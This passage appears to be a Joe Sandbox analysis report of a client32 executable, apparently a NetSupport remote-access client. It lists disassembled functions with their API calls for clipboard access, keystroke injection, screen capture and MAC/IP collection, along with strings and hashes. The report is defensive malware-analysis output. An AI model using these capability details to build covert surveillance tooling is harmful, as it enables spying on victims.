                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
                                                                                • API String ID: 0-293745777
                                                                                • Opcode ID: d6ddac33ee9b6d6072fce80ab62b67592f5839c241fe45a64ce58f0e7e606b81
                                                                                • Instruction ID: 04be3a73864f79ea4ff0060164bd048450722a5e4ebb998c6abac99bf16b3135
                                                                                • Opcode Fuzzy Hash: d6ddac33ee9b6d6072fce80ab62b67592f5839c241fe45a64ce58f0e7e606b81
                                                                                • Instruction Fuzzy Hash: FFA1B43AF142059FD714DB65DC91FAAF3A4EF98305F104199EA8A9B380DB71B901CB91
                                                                                Function 110934A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(11148360), ref: 110934A9
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110934D9
                                                                                • FindWindowA.USER32(NSMClassList,00000000), ref: 110934EA
                                                                                • SetForegroundWindow.USER32(00000000), ref: 110934F1
                                                                                  • Part of subcall function 11091920: GlobalAddAtomA.KERNEL32(NSMClassList), ref: 11091982
                                                                                  • Part of subcall function 11093410: GetClassInfoA.USER32(1109350C,NSMClassList,?), ref: 11093424
                                                                                  • Part of subcall function 11091A50: CreateWindowExA.USER32(00000000,NSMClassList,00000000,00000000), ref: 11091A9D
                                                                                  • Part of subcall function 11091A50: UpdateWindow.USER32(?), ref: 11091AEF
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093531
                                                                                  • Part of subcall function 11091B00: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11091B1A
                                                                                  • Part of subcall function 11091B00: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093540,?,00000000,?,00000000), ref: 11091B47
                                                                                  • Part of subcall function 11091B00: TranslateMessage.USER32(?), ref: 11091B51
                                                                                  • Part of subcall function 11091B00: DispatchMessageA.USER32(?), ref: 11091B5B
                                                                                  • Part of subcall function 11091B00: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11091B6B
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 11093555
                                                                                  • Part of subcall function 110919C0: GlobalDeleteAtom.KERNEL32(00000000), ref: 110919FE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdate_malloc_memsetwsprintf
                                                                                • String ID: NSMClassList$NSMFindClassEvent
                                                                                • API String ID: 1622498684-2883797795
                                                                                • Opcode ID: 1d17c6d06f0752a0e127f38c2cb7496eef9d81b3bf4849528fd07608f0b17edd
                                                                                • Instruction ID: 4b33314c0ec69eaaabe86fb2bb0f057967e6cef17922574bfca5772aa51aa607
                                                                                • Opcode Fuzzy Hash: 1d17c6d06f0752a0e127f38c2cb7496eef9d81b3bf4849528fd07608f0b17edd
                                                                                • Instruction Fuzzy Hash: E911C639F4822D67EB15A3F51D29B9FBA985B44BA8F010024F92DDA580EF64F400E6A5
                                                                                Function 11033320 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 87clipboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsClipboardFormatAvailable.USER32(?), ref: 11033361
                                                                                • GetClipboardData.USER32(?), ref: 1103337D
                                                                                • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110333FC
                                                                                • GetLastError.KERNEL32 ref: 11033406
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 11033426
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Clipboard$Format$AvailableDataErrorGlobalLastNameUnlock
                                                                                • String ID: ..\ctl32\clipbrd.cpp$pData && pSize
                                                                                • API String ID: 1861668072-1296821031
                                                                                • Opcode ID: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
                                                                                • Instruction ID: bd08247f7f5b97daa22515b1f99226a4dce8a406111026209efe1a9e37a97f87
                                                                                • Opcode Fuzzy Hash: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
                                                                                • Instruction Fuzzy Hash: 8121D336E1415D9FC701DFE998C1AAEF3B8EF8961AB0040A9E815DF300EF71A900CB90
                                                                                Function 11089430 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindResourceA.KERNEL32(00000000,00001770,0000000A), ref: 1108946F
                                                                                • LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CF1A6,?), ref: 11089484
                                                                                • LockResource.KERNEL32(00000000,?,00000000,?,110CF1A6,?), ref: 110894B6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLock
                                                                                • String ID: ..\ctl32\Errorhan.cpp$hMap
                                                                                • API String ID: 2752051264-327499879
                                                                                • Opcode ID: 4b4fe2a71f7d748f02518d03cf39b1b5f1061245372e77ab65800b9219663b1a
                                                                                • Instruction ID: 3c24799b714a192eacab9213173f85fc7e3b9246bd1fd21045fe874d5ce20fb5
                                                                                • Opcode Fuzzy Hash: 4b4fe2a71f7d748f02518d03cf39b1b5f1061245372e77ab65800b9219663b1a
                                                                                • Instruction Fuzzy Hash: BD11DA39E4937666D712EAFE9C44B7AB7D8ABC07A8B014471FC69E3540FB20D450C7A1
                                                                                Function 11113380 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • nc->cmd.mouse.nevents < NC_MAXEVENTS, xrefs: 111133D9
                                                                                • ..\ctl32\Remote.cpp, xrefs: 111133D4
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountIconicTick
                                                                                • String ID: ..\ctl32\Remote.cpp$nc->cmd.mouse.nevents < NC_MAXEVENTS
                                                                                • API String ID: 1307367305-2838568823
                                                                                • Opcode ID: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
                                                                                • Instruction ID: cb75b6c9c213d9e442ee644175f48350251445db3f236d69570c6cf200ac5b3b
                                                                                • Opcode Fuzzy Hash: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
                                                                                • Instruction Fuzzy Hash: 11018135AA8B528AC725CFB0C9456DAFBE4AF04359F00443DE49F86658FB24B082C70A
                                                                                Function 110C1020 Relevance: 6.1, APIs: 4, Instructions: 93windowthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsIconic.USER32(000000FF), ref: 110C10AD
                                                                                • ShowWindow.USER32(000000FF,00000009,?,1105E793,00000001,00000001,?,00000000), ref: 110C10BD
                                                                                • BringWindowToTop.USER32(000000FF), ref: 110C10C7
                                                                                • GetCurrentThreadId.KERNEL32 ref: 110C10E8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$BringCurrentIconicShowThread
                                                                                • String ID:
                                                                                • API String ID: 4184413098-0
                                                                                • Opcode ID: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
                                                                                • Instruction ID: 84533db14937db9444e2f7c69536c5845b28cc0232cb9748846df38ed0837754
                                                                                • Opcode Fuzzy Hash: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
                                                                                • Instruction Fuzzy Hash: 1731CD3AA00315DBDB14DE68D48079ABBA8AF48754F1540BAFC169F246CBB5E845CFE0
                                                                                Function 11113190 Relevance: 3.1, APIs: 2, Instructions: 54keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeviceIoControl.KERNEL32(?,00000101,?,00000001,00000000,00000000,?,00000000), ref: 111131E2
                                                                                • keybd_event.USER32(00000091,00000046,00000000,00000000), ref: 11113215
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ControlDevicekeybd_event
                                                                                • String ID:
                                                                                • API String ID: 1421710848-0
                                                                                • Opcode ID: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                                • Instruction ID: d69eaa5760cfcdb7a6e8037c3782fd2f7db196db4b5aaba7e7bab0ff0a721f20
                                                                                • Opcode Fuzzy Hash: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                                • Instruction Fuzzy Hash: E4012432F55A1539F30489B99E45FE7FA2CAB40721F014278EE59AB2C8DAA09904C6A0
                                                                                Function 110335A0 Relevance: 3.0, APIs: 2, Instructions: 49clipboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110335F6
                                                                                • SetClipboardData.USER32(00000000,00000000), ref: 11033612
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Clipboard$DataFormatName
                                                                                • String ID:
                                                                                • API String ID: 3172747766-0
                                                                                • Opcode ID: e17e0e6aed767a58da8d411b70808350d70cb6dd51a63046c179038dcd941cc4
                                                                                • Instruction ID: d021e7b1abaf81fd48200924965e9797cc36530c630056afc83bc75e16402c3f
                                                                                • Opcode Fuzzy Hash: e17e0e6aed767a58da8d411b70808350d70cb6dd51a63046c179038dcd941cc4
                                                                                • Instruction Fuzzy Hash: 6701D830D2E124AEC714DF608C8097EB7ACEF8960BB018556FC419A380EF29A601D7F6
                                                                                Function 1103D530 Relevance: 56.4, APIs: 14, Strings: 18, Instructions: 385libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$_memset$AddressFreeLoadProcwsprintf$_malloc
                                                                                • String ID: %02x%02x%02x%02x%02x%02x$%d adapters in chain, %d adapters by size$* $3$CLTCONN.CPP$GetAdaptersInfo$IPHLPAPI.DLL$Info. Netbios macaddr=%s$Info. Set MacAddr to %s$Info. Unable to load netapi32$Info. macaddr[%d]=%s, ipaddr=%hs/%hs$ListenAddress$Netbios$TCPIP$VIRTNET$Warning. Netbios() returned x%x$netapi32.dll$pGetAdaptersInfo
                                                                                • API String ID: 2942389153-3574733319
                                                                                • Opcode ID: cf2d16c8c97f05e0515526d6f1a9da3da889a5d61ab08703c0b3442b7c36f74d
                                                                                • Instruction ID: 9380186eaa86aba5e78307d08d1cef0eec38285017acdf678952b44c5cd5fdba
                                                                                • Opcode Fuzzy Hash: cf2d16c8c97f05e0515526d6f1a9da3da889a5d61ab08703c0b3442b7c36f74d
                                                                                • Instruction Fuzzy Hash: 60E13A75D1429A9FEB17CB648C90BEEBBF96F85305F4400D9E858B7240E630AB44CF61
                                                                                Function 110B3100 Relevance: 50.9, APIs: 23, Strings: 6, Instructions: 178filewindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenEventA.KERNEL32(00100000,00000000,Client32DIBQuit), ref: 110B3130
                                                                                • OpenEventA.KERNEL32(00100000,00000000,Client32DIBBlit), ref: 110B3141
                                                                                • OpenEventA.KERNEL32(00000002,00000000,Client32DIBDone), ref: 110B314F
                                                                                • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FA), ref: 110B3183
                                                                                • OpenFileMappingA.KERNEL32(000F001F,00000000,Client32DIB), ref: 110B31A6
                                                                                • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 110B31C2
                                                                                • GetDC.USER32(00000000), ref: 110B31E8
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 110B31FC
                                                                                • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 110B321F
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 110B3236
                                                                                • GetTickCount.KERNEL32 ref: 110B323F
                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110B3276
                                                                                • GetTickCount.KERNEL32 ref: 110B327F
                                                                                • GetLastError.KERNEL32(00000000), ref: 110B328E
                                                                                • GdiFlush.GDI32 ref: 110B32A2
                                                                                • SelectObject.GDI32(00000000,?), ref: 110B32AD
                                                                                • DeleteObject.GDI32(00000000), ref: 110B32B4
                                                                                • SetEvent.KERNEL32(?), ref: 110B32BE
                                                                                • DeleteDC.GDI32(00000000), ref: 110B32C8
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 110B32D4
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 110B32DE
                                                                                • CloseHandle.KERNEL32(00000000), ref: 110B32E5
                                                                                • CloseHandle.KERNEL32(00000000), ref: 110B3309
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
